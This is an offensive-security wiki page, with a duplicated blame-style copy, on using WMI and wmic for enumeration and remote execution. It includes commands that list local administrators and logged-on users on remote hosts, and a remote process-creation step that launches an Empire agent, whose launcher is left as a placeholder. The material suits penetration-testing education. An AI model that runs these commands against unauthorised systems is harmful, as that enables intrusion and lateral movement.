hacktricks/windows/ntlm/wmicexec.md

# WmicExec

## How Does it works

Wmi allows to open process in hosts where you know username/\(password/Hash\). Then, Wmiexec uses wmi to execute each command that is asked to execute \(this is why Wmicexec gives you semi-interactive shell\).

**dcomexec.py:** This script gives a semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints \(ShellBrowserWindow DCOM object\). Currently, it supports MMC20. Application, Shell Windows and Shell Browser Window objects. \(from [here](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)\)

## WMI Basics

**Namespace**: WMI is divided into a directory-style hierarchy, the \root container, with other directories under \root. These "directory paths" are called namespaces.  
List namespaces:

```bash
#Get Root namespaces
gwmi -namespace "root" -Class "__Namespace" | Select Name

#List all namespaces (you may need administrator to list all of them)
Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | select __Namespace | sort __Namespace

#List namespaces inside "root\cimv2"
Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace
```

List classes of a namespace with:

```bash
gwmwi -List -Recurse #If no namespace is specified, by default is used: "root\cimv2"
gwmi -Namespace "root/microsoft" -List -Recurse
```

**Classes:** The WMI class name eg: win32\_process is a starting point for any WMI action. We always need to know a Class Name and the Namespace where it is located.  
List classes starting with `win32`:

```bash
Get-WmiObject -Recurse -List -class win32* | more #If no namespace is specified, by default is used: "root\cimv2"
gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"
```

Call a class:

```bash
#When you don't specify a namespaces by default is "root/cimv2"
Get-WmiObject -Class win32_share
Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus
```

**Method:** WMI classes have one or more functions that can be executed. These functions are called methods

## WMI Enumeration

### Check WMI service

This how you can check if WMI service is running:

```bash
#Check if WMI service is running
Get-Service Winmgmt
Status   Name               DisplayName
------   ----               -----------
Running  Winmgmt            Windows Management Instrumentation

#From CMD
net start | findstr "Instrumentation"
```

### System Information

```bash
Get-WmiObject -ClassName win32_operatingsystem | select * | more
```

### Process Information

```bash
Get-WmiObject win32_process | Select Name, Processid
```

From an attacker's perspective, WMI can be very valuable in enumerating sensitive information about a system or the domain.

```text
wmic computerystem list full /format:list  
wmic process list /format:list  
wmic ntdomain list /format:list  
wmic useraccount list /format:list  
wmic group list /format:list  
wmic sysaccount list /format:list  
```

```bash
 Get-WmiObject Win32_Processor -ComputerName 10.0.0.182 -Credential $cred
```

## **Manual Remote WMI Querying**

For example, here's a very stealthy way to discover local admins on a remote machine \(note that domain is the computer name\):

```bash
wmic /node:ordws01 path win32_groupuser where (groupcomponent="win32_group.name=\"administrators\",domain=\"ORDWS01\"")  
```

Another useful oneliner is to see who is logged on to a machine \(for when you're hunting admins\):

```text
wmic /node:ordws01 path win32_loggedonuser get antecedent  
```

`wmic` can even read nodes from a text file and execute the command on all of them. If you have a text file of workstations:

```text
wmic /node:@workstations.txt path win32_loggedonuser get antecedent  
```

**We'll remotely create a process over WMI to execute a Empire agent:**

```bash
wmic /node:ordws01 /user:CSCOU\jarrieta path win32_process call create "**empire launcher string here**"  
```

We see it executed successfully \(ReturnValue = 0\). And a second later our Empire listener catches it. Note the process ID is the same as WMI returned.

All this information was extracted from here: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`# WmicExec`

			`## How Does it works`

			`Wmi allows to open process in hosts where you know username/\(password/Hash\). Then, Wmiexec uses wmi to execute each command that is asked to execute \(this is why Wmicexec gives you semi-interactive shell\).`

			`dcomexec.py: This script gives a semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints \(ShellBrowserWindow DCOM object\). Currently, it supports MMC20. Application, Shell Windows and Shell Browser Window objects. \(from [here](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)\)`

GitBook: [master] one page modified 2021-01-20 17:41:14 +00:00			`## WMI Basics`

			`Namespace: WMI is divided into a directory-style hierarchy, the \root container, with other directories under \root. These "directory paths" are called namespaces.`
			`List namespaces:`

			```bash
			`#Get Root namespaces`
			`gwmi -namespace "root" -Class "__Namespace" \| Select Name`

			`#List all namespaces (you may need administrator to list all of them)`
			`Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null \| select __Namespace \| sort __Namespace`

			`#List namespaces inside "root\cimv2"`
			`Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null \| select __Namespace \| sort __Namespace`
			```

			`List classes of a namespace with:`

			```bash
			`gwmwi -List -Recurse #If no namespace is specified, by default is used: "root\cimv2"`
			`gwmi -Namespace "root/microsoft" -List -Recurse`
			```

			`Classes: The WMI class name eg: win32\_process is a starting point for any WMI action. We always need to know a Class Name and the Namespace where it is located.`
			List classes starting with `win32`:

			```bash
			`Get-WmiObject -Recurse -List -class win32* \| more #If no namespace is specified, by default is used: "root\cimv2"`
			`gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"`
			```

			`Call a class:`

			```bash
			`#When you don't specify a namespaces by default is "root/cimv2"`
			`Get-WmiObject -Class win32_share`
			`Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus`
			```

			`Method: WMI classes have one or more functions that can be executed. These functions are called methods`

			`## WMI Enumeration`

			`### Check WMI service`

			`This how you can check if WMI service is running:`

			```bash
			`#Check if WMI service is running`
			`Get-Service Winmgmt`
			`Status Name DisplayName`
			`------ ---- -----------`
			`Running Winmgmt Windows Management Instrumentation`

			`#From CMD`
			`net start \| findstr "Instrumentation"`
			```

			`### System Information`

			```bash
			`Get-WmiObject -ClassName win32_operatingsystem \| select * \| more`
			```

			`### Process Information`

			```bash
			`Get-WmiObject win32_process \| Select Name, Processid`
			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`From an attacker's perspective, WMI can be very valuable in enumerating sensitive information about a system or the domain.`

			```text
			`wmic computerystem list full /format:list`
			`wmic process list /format:list`
			`wmic ntdomain list /format:list`
			`wmic useraccount list /format:list`
			`wmic group list /format:list`
			`wmic sysaccount list /format:list`
			```

GitBook: [master] one page modified 2021-01-09 15:04:24 +00:00			```bash
			`Get-WmiObject Win32_Processor -ComputerName 10.0.0.182 -Credential $cred`
			```

GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`## Manual Remote WMI Querying`

			`For example, here's a very stealthy way to discover local admins on a remote machine \(note that domain is the computer name\):`

GitBook: [master] one page modified 2021-01-03 18:40:02 +00:00			```bash
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`wmic /node:ordws01 path win32_groupuser where (groupcomponent="win32_group.name=\"administrators\",domain=\"ORDWS01\"")`
			```

			`Another useful oneliner is to see who is logged on to a machine \(for when you're hunting admins\):`

			```text
			`wmic /node:ordws01 path win32_loggedonuser get antecedent`
			```

			`wmic` can even read nodes from a text file and execute the command on all of them. If you have a text file of workstations:

			```text
			`wmic /node:@workstations.txt path win32_loggedonuser get antecedent`
			```

			`We'll remotely create a process over WMI to execute a Empire agent:`

GitBook: [master] one page modified 2021-01-03 18:40:02 +00:00			```bash
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`wmic /node:ordws01 /user:CSCOU\jarrieta path win32_process call create "empire launcher string here"`
			```

			`We see it executed successfully \(ReturnValue = 0\). And a second later our Empire listener catches it. Note the process ID is the same as WMI returned.`

			`All this information was extracted from here: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)`